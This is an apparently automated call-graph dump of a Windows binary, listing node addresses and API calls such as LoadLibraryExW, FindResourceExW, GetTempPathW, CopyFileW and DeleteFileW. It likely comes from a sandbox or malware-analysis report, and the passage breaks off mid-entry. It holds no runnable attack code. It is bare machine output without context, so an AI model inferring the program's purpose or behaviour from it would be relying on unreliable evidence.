101744->101901 101745->101746 101746->101667 101747->101764 101749->101744 101750->101744 101752 e049f timeGetTime 101752->101764 101893 c9e5d 60 API calls 101753->101893 101756 105b8f GetExitCodeProcess 101758 105ba5 WaitForSingleObject 101756->101758 101759 105bbb CloseHandle 101756->101759 101757->101744 101758->101744 101758->101759 101759->101764 101762 145f25 110 API calls 101762->101764 101763 cb7dd 109 API calls 101763->101764 101764->101743 101764->101744 101764->101746 101764->101752 101764->101756 101764->101762 101764->101763 101765 105874 101764->101765 101766 105078 Sleep 101764->101766 101767 105c17 Sleep 101764->101767 101769 c7de1 59 API calls 101764->101769 101902 122408 60 API calls 101764->101902 101903 c9e5d 60 API calls 101764->101903 101904 c89b3 69 API calls Mailbox 101764->101904 101905 cb73c 341 API calls 101764->101905 101906 1164da 60 API calls 101764->101906 101907 125244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 101764->101907 101908 123c55 66 API calls Mailbox 101764->101908 101765->101746 101766->101744 101767->101744 101769->101764 101775->101744 101778->101744 101780->101744 101781->101744 101782->101744 101783->101744 101784->101744 101785->101744 101786->101744 101787->101744 101788->101744 101789->101744 101790->101744 101791->101744 101793 feda1 101792->101793 101796 c82f2 101792->101796 101794 fedb1 101793->101794 102798 1161a4 59 API calls 101793->102798 101797 c831c 101796->101797 101798 c85c0 59 API calls 101796->101798 101802 c8339 Mailbox 101796->101802 101799 c8322 101797->101799 101800 c85c0 59 API calls 101797->101800 101798->101797 101801 c9c90 Mailbox 59 API calls 101799->101801 101799->101802 101800->101799 101801->101802 101802->101694 101803->101688 101804->101688 101805->101619 101806->101658 101807->101626 101808->101658 101809->101658 101810->101635 101811->101646 101812->101634 101813->101634 101815 c85ce 101814->101815 101820 c85f6 101814->101820 101816 c85dc 101815->101816 101817 c85c0 59 API calls 101815->101817 101818 c85e2 101816->101818 101819 c85c0 59 API calls 101816->101819 101817->101816 101818->101820 101821 c9c90 Mailbox 59 API calls 101818->101821 101819->101818 101820->101644 101821->101820 101822->101688 101823->101688 101824->101688 101826 c84cb 101825->101826 101828 c84f2 101826->101828 102799 c89b3 69 API calls Mailbox 101826->102799 101828->101673 101829->101658 101830->101674 101831->101658 101832->101706 101833->101713 101835 ce6d5 101834->101835 101836 103aa9 101835->101836 101839 ce73f 101835->101839 101848 ce799 101835->101848 101837 c9ea0 341 API calls 101836->101837 101838 103abe 101837->101838 101853 ce970 Mailbox 101838->101853 101910 129e4a 89 API calls 4 library calls 101838->101910 101842 c7667 59 API calls 101839->101842 101839->101848 101840 c7667 59 API calls 101840->101848 101844 103b04 101842->101844 101843 e2d40 __cinit 67 API calls 101843->101848 101845 e2d40 __cinit 67 API calls 101844->101845 101845->101848 101846 103b26 101846->101744 101847 c84c0 69 API calls 101847->101853 101848->101840 101848->101843 101848->101846 101850 ce95a 101848->101850 101848->101853 101849 c9ea0 341 API calls 101849->101853 101850->101853 101911 129e4a 89 API calls 4 library calls 101850->101911 101851 129e4a 89 API calls 101851->101853 101853->101847 101853->101849 101853->101851 101854 c8d40 59 API calls 101853->101854 101856 c9c90 Mailbox 59 API calls 101853->101856 101861 cf195 101853->101861 101864 cea78 101853->101864 101909 c7f77 59 API calls 2 library calls 101853->101909 101912 116e8f 59 API calls 101853->101912 101913 13c5c3 341 API calls 101853->101913 101914 13b53c 341 API calls Mailbox 101853->101914 101916 1393c6 341 API calls Mailbox 101853->101916 101854->101853 101856->101853 101915 129e4a 89 API calls 4 library calls 101861->101915 101863 103e25 101863->101744 101864->101744 101866 cf4ba 101865->101866 101867 cf650 101865->101867 101868 cf4c6 101866->101868 101869 10441e 101866->101869 101870 c7de1 59 API calls 101867->101870 102018 cf290 341 API calls 2 library calls 101868->102018 102019 13bc6b 341 API calls Mailbox 101869->102019 101876 cf58c Mailbox 101870->101876 101873 10442c 101877 cf630 101873->101877 102020 129e4a 89 API calls 4 library calls 101873->102020 101875 cf4fd 101875->101873 101875->101876 101875->101877 101917 123c37 101876->101917 101920 13df37 101876->101920 101923 13445a 101876->101923 101932 12cb7a 101876->101932 102012 c4e4a 101876->102012 101877->101744 101878 c9c90 Mailbox 59 API calls 101879 cf5e3 101878->101879 101879->101877 101879->101878 101886 c3212 101885->101886 101887 c31e0 101885->101887 101886->101744 101887->101886 101888 c3205 IsDialogMessageW 101887->101888 101889 fcf32 GetClassLongW 101887->101889 101888->101886 101888->101887 101889->101887 101889->101888 101890->101744 101891->101721 101892->101727 101893->101744 101894->101728 101895->101728 101896->101728 101897->101744 101898->101744 101899->101744 101900->101744 101901->101744 101902->101764 101903->101764 101904->101764 101905->101764 101906->101764 101907->101764 101908->101764 101909->101853 101910->101853 101911->101853 101912->101853 101913->101853 101914->101853 101915->101863 101916->101853 102021 12445a GetFileAttributesW 101917->102021 101921 13cadd 130 API calls 101920->101921 101922 13df47 101921->101922 101922->101879 101924 c9837 84 API calls 101923->101924 101925 134494 101924->101925 102025 c6240 101925->102025 101927 1344a4 101928 1344c9 101927->101928 101929 c9ea0 341 API calls 101927->101929 101931 1344cd 101928->101931 102050 c9a98 59 API calls Mailbox 101928->102050 101929->101928 101931->101879 101933 c7667 59 API calls 101932->101933 101934 12cbaf 101933->101934 101935 c7667 59 API calls 101934->101935 101936 12cbb8 101935->101936 101937 12cbcc 101936->101937 102266 c9b3c 59 API calls 101936->102266 101939 c9837 84 API calls 101937->101939 101940 12cbe9 101939->101940 101941 12ccea 101940->101941 101942 12cc0b 101940->101942 102011 12cd1a Mailbox 101940->102011 102070 c4ddd 101941->102070 101943 c9837 84 API calls 101942->101943 101945 12cc17 101943->101945 101947 c8047 59 API calls 101945->101947 101949 12cc23 101947->101949 101948 12cd16 101951 c7667 59 API calls 101948->101951 101948->102011 101955 12cc37 101949->101955 101956 12cc69 101949->101956 101950 c4ddd 136 API calls 101950->101948 101952 12cd4b 101951->101952 101953 c7667 59 API calls 101952->101953 101954 12cd54 101953->101954 101957 c7667 59 API calls 101954->101957 101958 c8047 59 API calls 101955->101958 101959 c9837 84 API calls 101956->101959 101961 12cd5d 101957->101961 101962 12cc47 101958->101962 101960 12cc76 101959->101960 101963 c8047 59 API calls 101960->101963 101964 c7667 59 API calls 101961->101964 101965 c7cab 59 API calls 101962->101965 101966 12cc82 101963->101966 101967 12cd66 101964->101967 101968 12cc51 101965->101968 102267 124a31 GetFileAttributesW 101966->102267 101970 c9837 84 API calls 101967->101970 101971 c9837 84 API calls 101968->101971 101973 12cd73 101970->101973 101974 12cc5d 101971->101974 101972 12cc8b 101975 12cc9e 101972->101975 101978 c79f2 59 API calls 101972->101978 102094 c459b 101973->102094 101977 c7b2e 59 API calls 101974->101977 101980 c9837 84 API calls 101975->101980 101986 12cca4 101975->101986 101977->101956 101978->101975 101979 12cd8e 102145 c79f2 101979->102145 101982 12cccb 101980->101982 102268 1237ef 75 API calls Mailbox 101982->102268 101985 12cdd1 101987 c8047 59 API calls 101985->101987 101986->102011 101989 12cddf 101987->101989 101988 c79f2 59 API calls 101990 12cdae 101988->101990 102148 c7b2e 101989->102148 101990->101985 101993 c7bcc 59 API calls 101990->101993 101994 12cdc3 101993->101994 101996 c7bcc 59 API calls 101994->101996 101995 c7b2e 59 API calls 101997 12cdfb 101995->101997 101996->101985 101998 c7b2e 59 API calls 101997->101998 101999 12ce09 101998->101999 102000 c9837 84 API calls 101999->102000 102001 12ce15 102000->102001 102157 124071 102001->102157 102003 12ce26 102004 123c37 3 API calls 102003->102004 102005 12ce30 102004->102005 102006 c9837 84 API calls 102005->102006 102010 12ce61 102005->102010 102007 12ce4e 102006->102007 102211 129155 102007->102211 102009 c4e4a 84 API calls 102009->102011 102010->102009 102011->101879 102013 c4e54 102012->102013 102015 c4e5b 102012->102015 102014 e53a6 __fcloseall 83 API calls 102013->102014 102014->102015 102016 c4e6a 102015->102016 102017 c4e7b FreeLibrary 102015->102017 102016->101879 102017->102016 102018->101875 102019->101873 102020->101877 102022 123c3e 102021->102022 102023 124475 FindFirstFileW 102021->102023 102022->101879 102023->102022 102024 12448a FindClose 102023->102024 102024->102022 102051 c7a16 102025->102051 102027 c646a 102058 c750f 102027->102058 102029 c6484 Mailbox 102029->101927 102032 c6265 102032->102027 102033 c7d8c 59 API calls 102032->102033 102034 c6799 _memmove 102032->102034 102035 fdff6 102032->102035 102036 c750f 59 API calls 102032->102036 102043 fdf92 102032->102043 102047 c7e4f 59 API calls 102032->102047 102056 c5f6c 60 API calls 102032->102056 102057 c5d41 59 API calls Mailbox 102032->102057 102066 c5e72 60 API calls 102032->102066 102067 c7924 59 API calls 2 library calls 102032->102067 102033->102032 102069 11f8aa 91 API calls 4 library calls 102034->102069 102068 11f8aa 91 API calls 4 library calls 102035->102068 102036->102032 102039 fe004 102041 c750f 59 API calls 102039->102041 102042 fe01a 102041->102042 102042->102029 102044 c8029 59 API calls 102043->102044 102045 fdf9d 102044->102045 102049 e0db6 Mailbox 59 API calls 102045->102049 102048 c643b CharUpperBuffW 102047->102048 102048->102032 102049->102034 102050->101931 102052 e0db6 Mailbox 59 API calls 102051->102052 102053 c7a3b 102052->102053 102054 c8029 59 API calls 102053->102054 102055 c7a4a 102054->102055 102055->102032 102056->102032 102057->102032 102059 c75af 102058->102059 102060 c7522 _memmove 102058->102060 102062 e0db6 Mailbox 59 API calls 102059->102062 102061 e0db6 Mailbox 59 API calls 102060->102061 102064 c7529 102061->102064 102062->102060 102063 c7552 102063->102029 102064->102063 102065 e0db6 Mailbox 59 API calls 102064->102065 102065->102063 102066->102032 102067->102032 102068->102039 102069->102029 102269 c4bb5 102070->102269 102075 c4e08 LoadLibraryExW 102279 c4b6a 102075->102279 102076 fd8e6 102077 c4e4a 84 API calls 102076->102077 102079 fd8ed 102077->102079 102081 c4b6a 3 API calls 102079->102081 102083 fd8f5 102081->102083 102305 c4f0b 102083->102305 102084 c4e2f 102084->102083 102085 c4e3b 102084->102085 102086 c4e4a 84 API calls 102085->102086 102088 c4e40 102086->102088 102088->101948 102088->101950 102091 fd91c 102313 c4ec7 102091->102313 102095 c7667 59 API calls 102094->102095 102096 c45b1 102095->102096 102097 c7667 59 API calls 102096->102097 102098 c45b9 102097->102098 102099 c7667 59 API calls 102098->102099 102100 c45c1 102099->102100 102101 c7667 59 API calls 102100->102101 102102 c45c9 102101->102102 102103 c45fd 102102->102103 102104 fd4d2 102102->102104 102105 c784b 59 API calls 102103->102105 102106 c8047 59 API calls 102104->102106 102107 c460b 102105->102107 102108 fd4db 102106->102108 102109 c7d2c 59 API calls 102107->102109 102110 c7d8c 59 API calls 102108->102110 102111 c4615 102109->102111 102113 c4640 102110->102113 102112 c784b 59 API calls 102111->102112 102111->102113 102116 c4636 102112->102116 102114 c4680 102113->102114 102117 c465f 102113->102117 102127 fd4fb 102113->102127 102115 c784b 59 API calls 102114->102115 102118 c4691 102115->102118 102119 c7d2c 59 API calls 102116->102119 102121 c79f2 59 API calls 102117->102121 102122 c46a3 102118->102122 102125 c8047 59 API calls 102118->102125 102119->102113 102120 fd5cb 102123 c7bcc 59 API calls 102120->102123 102124 c4669 102121->102124 102126 c46b3 102122->102126 102128 c8047 59 API calls 102122->102128 102144 fd588 102123->102144 102124->102114 102131 c784b 59 API calls 102124->102131 102125->102122 102130 c46ba 102126->102130 102132 c8047 59 API calls 102126->102132 102127->102120 102129 fd5b4 102127->102129 102141 fd532 102127->102141 102128->102126 102129->102120 102134 fd59f 102129->102134 102133 c8047 59 API calls 102130->102133 102140 c46c1 Mailbox 102130->102140 102131->102114 102132->102130 102133->102140 102136 c7bcc 59 API calls 102134->102136 102135 fd590 102137 c7bcc 59 API calls 102135->102137 102136->102144 102137->102144 102138 c79f2 59 API calls 102138->102144 102140->101979 102141->102135 102142 fd57b 102141->102142 102143 c7bcc 59 API calls 102142->102143 102143->102144 102144->102114 102144->102138 102485 c7924 59 API calls 2 library calls 102144->102485 102146 c7e4f 59 API calls 102145->102146 102147 c79fd 102146->102147 102147->101985 102147->101988 102149 fec6b 102148->102149 102150 c7b40 102148->102150 102492 117bdb 59 API calls _memmove 102149->102492 102486 c7a51 102150->102486 102153 c7b4c 102153->101995 102154 fec75 102155 c8047 59 API calls 102154->102155 102156 fec7d Mailbox 102155->102156 102158 12408d 102157->102158 102159 124092 102158->102159 102160 1240a0 102158->102160 102161 c8047 59 API calls 102159->102161 102162 c7667 59 API calls 102160->102162 102163 12409b Mailbox 102161->102163 102164 1240a8 102162->102164 102163->102003 102165 c7667 59 API calls 102164->102165 102166 1240b0 102165->102166 102167 c7667 59 API calls 102166->102167 102168 1240bb 102167->102168 102169 c7667 59 API calls 102168->102169 102170 1240c3 102169->102170 102171 c7667 59 API calls 102170->102171 102172 1240cb 102171->102172 102173 c7667 59 API calls 102172->102173 102174 1240d3 102173->102174 102175 c7667 59 API calls 102174->102175 102176 1240db 102175->102176 102177 c7667 59 API calls 102176->102177 102178 1240e3 102177->102178 102179 c459b 59 API calls 102178->102179 102180 1240fa 102179->102180 102181 c459b 59 API calls 102180->102181 102182 124113 102181->102182 102183 c79f2 59 API calls 102182->102183 102184 12411f 102183->102184 102185 124132 102184->102185 102186 c7d2c 59 API calls 102184->102186 102187 c79f2 59 API calls 102185->102187 102186->102185 102188 12413b 102187->102188 102189 12414b 102188->102189 102190 c7d2c 59 API calls 102188->102190 102191 c8047 59 API calls 102189->102191 102190->102189 102192 124157 102191->102192 102193 c7b2e 59 API calls 102192->102193 102194 124163 102193->102194 102493 124223 59 API calls 102194->102493 102196 124172 102494 124223 59 API calls 102196->102494 102198 124185 102199 c79f2 59 API calls 102198->102199 102200 12418f 102199->102200 102201 1241a6 102200->102201 102202 124194 102200->102202 102204 c79f2 59 API calls 102201->102204 102203 c7cab 59 API calls 102202->102203 102205 1241a1 102203->102205 102206 1241af 102204->102206 102209 c7b2e 59 API calls 102205->102209 102207 1241cd 102206->102207 102208 c7cab 59 API calls 102206->102208 102210 c7b2e 59 API calls 102207->102210 102208->102205 102209->102207 102210->102163 102212 129162 __write_nolock 102211->102212 102213 e0db6 Mailbox 59 API calls 102212->102213 102214 1291bf 102213->102214 102215 c522e 59 API calls 102214->102215 102216 1291c9 102215->102216 102217 128f5f GetSystemTimeAsFileTime 102216->102217 102218 1291d4 102217->102218 102219 c4ee5 85 API calls 102218->102219 102220 1291e7 _wcscmp 102219->102220 102221 12920b 102220->102221 102222 1292b8 102220->102222 102525 129734 102221->102525 102224 129734 96 API calls 102222->102224 102239 129284 _wcscat 102224->102239 102227 c4f0b 74 API calls 102229 1292dd 102227->102229 102228 1292c1 102228->102010 102230 c4f0b 74 API calls 102229->102230 102231 1292ed 102230->102231 102233 c4f0b 74 API calls 102231->102233 102232 129239 _wcscat _wcscpy 102532 e40fb 58 API calls __wsplitpath_helper 102232->102532 102235 129308 102233->102235 102236 c4f0b 74 API calls 102235->102236 102237 129318 102236->102237 102238 c4f0b 74 API calls 102237->102238 102240 129333 102238->102240 102239->102227 102239->102228 102241 c4f0b 74 API calls 102240->102241 102242 129343 102241->102242 102243 c4f0b 74 API calls 102242->102243 102244 129353 102243->102244 102245 c4f0b 74 API calls 102244->102245 102246 129363 102245->102246 102495 1298e3 GetTempPathW GetTempFileNameW 102246->102495 102248 12936f 102249 e525b 115 API calls 102248->102249 102259 129380 102249->102259 102250 12943a 102509 e53a6 102250->102509 102252 129445 102254 12944b DeleteFileW 102252->102254 102255 12945f 102252->102255 102253 c4f0b 74 API calls 102253->102259 102254->102228 102256 129505 CopyFileW 102255->102256 102261 129469 _wcsncpy 102255->102261 102257 12951b DeleteFileW 102256->102257 102258 12952d DeleteFileW 102256->102258 102257->102228 102522 1298a2 CreateFileW 102258->102522 102259->102228 102259->102250 102259->102253 102496 e4863 102259->102496 102533 128b06 116 API calls __fcloseall 102261->102533 102264 1294f0 102264->102258 102265 1294f4 DeleteFileW 102264->102265 102265->102228 102266->101937 102267->101972 102268->101986 102318 c4c03 102269->102318 102272 c4bdc 102274 c4bec FreeLibrary 102272->102274 102275 c4bf5 102272->102275 102273 c4c03 2 API calls 102273->102272 102274->102275 102276 e525b 102275->102276 102322 e5270 102276->102322 102278 c4dfc 102278->102075 102278->102076 102403 c4c36 102279->102403 102282 c4c36 2 API calls 102285 c4b8f 102282->102285 102283 c4baa 102286 c4c70 102283->102286 102284 c4ba1 FreeLibrary 102284->102283 102285->102283 102285->102284 102287 e0db6 Mailbox 59 API calls 102286->102287 102288 c4c85 102287->102288 102289 c522e 59 API calls 102288->102289 102290 c4c91 _memmove 102289->102290 102291 c4ccc 102290->102291 102293 c4d89 102290->102293 102294 c4dc1 102290->102294 102292 c4ec7 69 API calls 102291->102292 102300 c4cd5 102292->102300 102407 c4e89 CreateStreamOnHGlobal 102293->102407 102418 12991b 95 API calls 102294->102418 102297 c4f0b 74 API calls 102297->102300 102299 c4d69 102299->102084 102300->102297 102300->102299 102301 fd8a7 102300->102301 102413 c4ee5 102300->102413 102302 c4ee5 85 API calls 102301->102302 102303 fd8bb 102302->102303 102304 c4f0b 74 API calls 102303->102304 102304->102299 102306 c4f1d 102305->102306 102307 fd9cd 102305->102307 102442 e55e2 102306->102442 102310 129109 102462 128f5f 102310->102462 102312 12911f 102312->102091 102314 c4ed6 102313->102314 102317 fd990 102313->102317 102467 e5c60 102314->102467 102316 c4ede 102319 c4bd0 102318->102319 102320 c4c0c LoadLibraryA 102318->102320 102319->102272 102319->102273 102320->102319 102321 c4c1d GetProcAddress 102320->102321 102321->102319 102324 e527c _raise 102322->102324 102323 e528f 102371 e8b28 58 API calls __getptd_noexit 102323->102371 102324->102323 102327 e52c0 102324->102327 102326 e5294 102372 e8db6 9 API calls __wsplitpath_helper 102326->102372 102341 f04e8 102327->102341 102330 e52c5 102331 e52ce 102330->102331 102332 e52db 102330->102332 102373 e8b28 58 API calls __getptd_noexit 102331->102373 102334 e5305 102332->102334 102335 e52e5 102332->102335 102356 f0607 102334->102356 102374 e8b28 58 API calls __getptd_noexit 102335->102374 102337 e529f _raise @_EH4_CallFilterFunc@8 102337->102278 102342 f04f4 _raise 102341->102342 102343 e9c0b __lock 58 API calls 102342->102343 102354 f0502 102343->102354 102344 f0576 102376 f05fe 102344->102376 102345 f057d 102381 e881d 58 API calls 2 library calls 102345->102381 102348 f0584 102348->102344 102382 e9e2b InitializeCriticalSectionAndSpinCount 102348->102382 102349 f05f3 _raise 102349->102330 102351 e9c93 __mtinitlocknum 58 API calls 102351->102354 102353 f05aa EnterCriticalSection 102353->102344 102354->102344 102354->102345 102354->102351 102379 e6c50 59 API calls __lock 102354->102379 102380 e6cba LeaveCriticalSection LeaveCriticalSection _doexit 102354->102380 102357 f0627 __wopenfile 102356->102357 102358 f0641 102357->102358 102370 f07fc 102357->102370 102389 e37cb 60 API calls 2 library calls 102357->102389 102387 e8b28 58 API calls __getptd_noexit 102358->102387 102360 f0646 102388 e8db6 9 API calls __wsplitpath_helper 102360->102388 102362 f085f 102384 f85a1 102362->102384 102363 e5310 102375 e5332 LeaveCriticalSection LeaveCriticalSection _fseek 102363->102375 102366 f07f5 102366->102370 102390 e37cb 60 API calls 2 library calls 102366->102390 102368 f0814 102368->102370 102391 e37cb 60 API calls 2 library calls 102368->102391 102370->102358 102370->102362 102371->102326 102372->102337 102373->102337 102374->102337 102375->102337 102383 e9d75 LeaveCriticalSection 102376->102383 102378 f0605 102378->102349 102379->102354 102380->102354 102381->102348 102382->102353 102383->102378 102392 f7d85 102384->102392 102386 f85ba 102386->102363 102387->102360 102388->102363 102389->102366 102390->102368 102391->102370 102394 f7d91 _raise 102392->102394 102393 f7da7 102395 e8b28 __wsplitpath_helper 58 API calls 102393->102395 102394->102393 102396 f7ddd 102394->102396 102397 f7dac 102395->102397 102398 f7e4e __wsopen_nolock 109 API calls 102396->102398 102399 e8db6 __wsplitpath_helper 9 API calls 102397->102399 102400 f7df9 102398->102400 102402 f7db6 _raise 102399->102402 102401 f7e22 __wsopen_helper LeaveCriticalSection 102400->102401 102401->102402 102402->102386 102404 c4b83 102403->102404 102405 c4c3f LoadLibraryA 102403->102405 102404->102282 102404->102285 102405->102404 102406 c4c50 GetProcAddress 102405->102406 102406->102404 102408 c4ec0 102407->102408 102409 c4ea3 FindResourceExW 102407->102409 102408->102291 102409->102408 102410 fd933 LoadResource 102409->102410 102410->102408 102411 fd948 SizeofResource 102410->102411 102411->102408 102412 fd95c LockResource 102411->102412 102412->102408 102414 fd9ab 102413->102414 102415 c4ef4 102413->102415 102419 e584d 102415->102419 102417 c4f02 102417->102300 102418->102291 102420 e5859 _raise 102419->102420 102421 e586b 102420->102421 102423 e5891 102420->102423 102432 e8b28 58 API calls __getptd_noexit 102421->102432 102434 e6c11 102423->102434 102425 e5870 102433 e8db6 9 API calls __wsplitpath_helper 102425->102433 102429 e58a6 102441 e58c8 LeaveCriticalSection LeaveCriticalSection _fseek 102429->102441 102431 e587b _raise 102431->102417 102432->102425 102433->102431 102435 e6c43 EnterCriticalSection 102434->102435 102436 e6c21 102434->102436 102438 e5897 102435->102438 102436->102435 102437 e6c29 102436->102437 102439 e9c0b __lock 58 API calls 102437->102439 102440 e57be 83 API calls 5 library calls 102438->102440 102439->102438 102440->102429 102441->102431 102445 e55fd 102442->102445 102444 c4f2e 102444->102310 102446 e5609 _raise 102445->102446 102447 e561f _memset 102446->102447 102448 e564c 102446->102448 102449 e5644 _raise 102446->102449 102458 e8b28 58 API calls __getptd_noexit 102447->102458 102450 e6c11 __lock_file 59 API calls 102448->102450 102449->102444 102451 e5652 102450->102451 102460 e541d 72 API calls 6 library calls 102451->102460 102453 e5639 102459 e8db6 9 API calls __wsplitpath_helper 102453->102459 102456 e5668 102461 e5686 LeaveCriticalSection LeaveCriticalSection _fseek 102456->102461 102458->102453 102459->102449 102460->102456 102461->102449 102465 e520a GetSystemTimeAsFileTime 102462->102465 102464 128f6e 102464->102312 102466 e5238 __aulldiv 102465->102466 102466->102464 102468 e5c6c _raise 102467->102468 102469 e5c7e 102468->102469 102470 e5c93 102468->102470 102481 e8b28 58 API calls __getptd_noexit 102469->102481 102472 e6c11 __lock_file 59 API calls 102470->102472 102474 e5c99 102472->102474 102473 e5c83 102482 e8db6 9 API calls __wsplitpath_helper 102473->102482 102483 e58d0 67 API calls 6 library calls 102474->102483 102477 e5ca4 102484 e5cc4 LeaveCriticalSection LeaveCriticalSection _fseek 102477->102484 102479 e5cb6 102480 e5c8e _raise 102479->102480 102480->102316 102481->102473 102482->102480 102483->102477 102484->102479 102485->102144 102487 c7a5f 102486->102487 102491 c7a85 _memmove 102486->102491 102488 e0db6 Mailbox 59 API calls 102487->102488 102487->102491 102489 c7ad4 102488->102489 102490 e0db6 Mailbox 59 API calls 102489->102490 102490->102491 102491->102153 102492->102154 102493->102196 102494->102198 102495->102248 102497 e486f _raise 102496->102497 102498 e489d _raise 102497->102498 102499 e488d 102497->102499 102500 e48a5 102497->102500 102498->102259 102546 e8b28 58 API calls __getptd_noexit 102499->102546 102502 e6c11 __lock_file 59 API calls 102500->102502 102504 e48ab 102502->102504 102503 e4892 102547 e8db6 9 API calls __wsplitpath_helper 102503->102547 102534 e470a 102504->102534 102510 e53b2 _raise 102509->102510 102511 e53de 102510->102511 102512 e53c6 102510->102512 102515 e6c11 __lock_file 59 API calls 102511->102515 102518 e53d6 _raise 102511->102518 102725 e8b28 58 API calls __getptd_noexit 102512->102725 102514 e53cb 102726 e8db6 9 API calls __wsplitpath_helper 102514->102726 102517 e53f0 102515->102517 102709 e533a 102517->102709 102518->102252 102523 1298c8 SetFileTime CloseHandle 102522->102523 102524 1298de 102522->102524 102523->102524 102524->102228 102529 129748 __tzset_nolock _wcscmp 102525->102529 102526 129210 102526->102228 102531 e40fb 58 API calls __wsplitpath_helper 102526->102531 102527 129109 GetSystemTimeAsFileTime 102527->102529 102528 c4ee5 85 API calls 102528->102529 102529->102526 102529->102527 102529->102528 102530 c4f0b 74 API calls 102529->102530 102530->102529 102531->102232 102532->102239 102533->102264 102536 e4719 102534->102536 102542 e4737 102534->102542 102535 e4727 102584 e8b28 58 API calls __getptd_noexit 102535->102584 102536->102535 102540 e4751 _memmove 102536->102540 102536->102542 102538 e472c 102585 e8db6 9 API calls __wsplitpath_helper 102538->102585 102540->102542 102549 e46e6 102540->102549 102556 ed886 102540->102556 102586 e4a3d 102540->102586 102592 eae1e 78 API calls 5 library calls 102540->102592 102548 e48dd LeaveCriticalSection LeaveCriticalSection _fseek 102542->102548 102546->102503 102547->102498 102548->102498 102550 e4705 102549->102550 102551 e46f0 102549->102551 102550->102540 102593 e8b28 58 API calls __getptd_noexit 102551->102593 102553 e46f5 102594 e8db6 9 API calls __wsplitpath_helper 102553->102594 102555 e4700 102555->102540 102557 ed892 _raise 102556->102557 102558 ed89f 102557->102558 102559 ed8b6 102557->102559 102668 e8af4 58 API calls __getptd_noexit 102558->102668 102561 ed955 102559->102561 102564 ed8ca 102559->102564 102674 e8af4 58 API calls __getptd_noexit 102561->102674 102563 ed8a4 102669 e8b28 58 API calls __getptd_noexit 102563->102669 102567 ed8e8 102564->102567 102568 ed8f2 102564->102568 102565 ed8ed 102675 e8b28 58 API calls __getptd_noexit 102565->102675 102670 e8af4 58 API calls __getptd_noexit 102567->102670 102595 ed206 102568->102595 102572 ed8f8 102574 ed91e 102572->102574 102575 ed90b 102572->102575 102573 ed961 102676 e8db6 9 API calls __wsplitpath_helper 102573->102676 102671 e8b28 58 API calls __getptd_noexit 102574->102671 102604 ed975 102575->102604 102579 ed8ab _raise 102579->102540 102580 ed917 102673 ed94d LeaveCriticalSection __unlock_fhandle 102580->102673 102581 ed923 102672 e8af4 58 API calls __getptd_noexit 102581->102672 102584->102538 102585->102542 102587 e4a50 102586->102587 102591 e4a74 102586->102591 102588 e46e6 __flswbuf 58 API calls 102587->102588 102587->102591 102589 e4a6d 102588->102589 102590 ed886 __write 78 API calls 102589->102590 102590->102591 102591->102540 102592->102540 102593->102553 102594->102555 102596 ed212 _raise 102595->102596 102597 ed261 EnterCriticalSection 102596->102597 102598 e9c0b __lock 58 API calls 102596->102598 102599 ed287 _raise 102597->102599 102601 ed237 102598->102601 102599->102572 102600 ed24f 102678 ed28b LeaveCriticalSection _doexit 102600->102678 102601->102600 102677 e9e2b InitializeCriticalSectionAndSpinCount 102601->102677 102605 ed982 __write_nolock 102604->102605 102606 ed9b6 102605->102606 102607 ed9e0 102605->102607 102608 ed9c1 102605->102608 102702 ec5f6 102606->102702 102611 eda38 102607->102611 102612 eda1c 102607->102612 102688 e8af4 58 API calls __getptd_noexit 102608->102688 102616 eda51 102611->102616 102694 f18c1 60 API calls 3 library calls 102611->102694 102691 e8af4 58 API calls __getptd_noexit 102612->102691 102613 ee1d6 102613->102580 102614 ed9c6 102689 e8b28 58 API calls __getptd_noexit 102614->102689 102679 f5c6b 102616->102679 102618 eda21 102668->102563 102669->102579 102670->102565 102671->102581 102672->102580 102673->102579 102674->102565 102675->102573 102676->102579 102677->102600 102678->102597 102688->102614 102691->102618 102694->102616 102703 ec5fe 102702->102703 102704 ec600 IsProcessorFeaturePresent 102702->102704 102703->102613 102706 f590a 102704->102706 102710 e535d 102709->102710 102711 e5349 102709->102711 102714 e4a3d __flush 78 API calls 102710->102714 102723 e5359 102710->102723 102758 e8b28 58 API calls __getptd_noexit 102711->102758 102713 e534e 102759 e8db6 9 API calls __wsplitpath_helper 102713->102759 102716 e5369 102714->102716 102728 f0b77 102716->102728 102719 e46e6 __flswbuf 58 API calls 102720 e5377 102719->102720 102732 f0a02 102720->102732 102722 e537d 102722->102723 102724 e2d55 _free 58 API calls 102722->102724 102727 e5415 LeaveCriticalSection LeaveCriticalSection _fseek 102723->102727 102724->102723 102725->102514 102726->102518 102727->102518 102729 e5371 102728->102729 102730 f0b84 102728->102730 102729->102719 102730->102729 102731 e2d55 _free 58 API calls 102730->102731 102731->102729 102733 f0a0e _raise 102732->102733 102734 f0a1b 102733->102734 102735 f0a32 102733->102735 102775 e8af4 58 API calls __getptd_noexit 102734->102775 102737 f0abd 102735->102737 102739 f0a42 102735->102739 102780 e8af4 58 API calls __getptd_noexit 102737->102780 102738 f0a20 102776 e8b28 58 API calls __getptd_noexit 102738->102776 102742 f0a6a 102739->102742 102743 f0a60 102739->102743 102746 ed206 ___lock_fhandle 59 API calls 102742->102746 102777 e8af4 58 API calls __getptd_noexit 102743->102777 102744 f0a65 102781 e8b28 58 API calls __getptd_noexit 102744->102781 102748 f0a70 102746->102748 102750 f0a8e 102748->102750 102751 f0a83 102748->102751 102749 f0ac9 102782 e8db6 9 API calls __wsplitpath_helper 102749->102782 102778 e8b28 58 API calls __getptd_noexit 102750->102778 102760 f0add 102751->102760 102755 f0a27 _raise 102755->102722 102756 f0a89 102779 f0ab5 LeaveCriticalSection __unlock_fhandle 102756->102779 102758->102713 102759->102723 102783 ed4c3 102760->102783 102775->102738 102776->102755 102777->102744 102778->102756 102779->102755 102780->102744 102781->102749 102782->102755 102784 ed4ce 102783->102784 102787 ed4e3 102783->102787 102798->101794 102799->101828 102800 e7c56 102801 e7c62 _raise 102800->102801 102837 e9e08 GetStartupInfoW 102801->102837 102803 e7c67 102839 e8b7c GetProcessHeap 102803->102839 102805 e7cbf 102808 e7cca 102805->102808 102922 e7da6 58 API calls 3 library calls 102805->102922 102840 e9ae6 102808->102840 102809 e7cd0 102810 e7cdb __RTC_Initialize 102809->102810 102923 e7da6 58 API calls 3 library calls 102809->102923 102861 ed5d2 102810->102861 102813 e7cea 102814 e7cf6 GetCommandLineW 102813->102814 102924 e7da6 58 API calls 3 library calls 102813->102924 102880 f4f23 GetEnvironmentStringsW 102814->102880 102817 e7cf5 102817->102814 102820 e7d10 102821 e7d1b 102820->102821 102925 e30b5 58 API calls 3 library calls 102820->102925 102890 f4d58 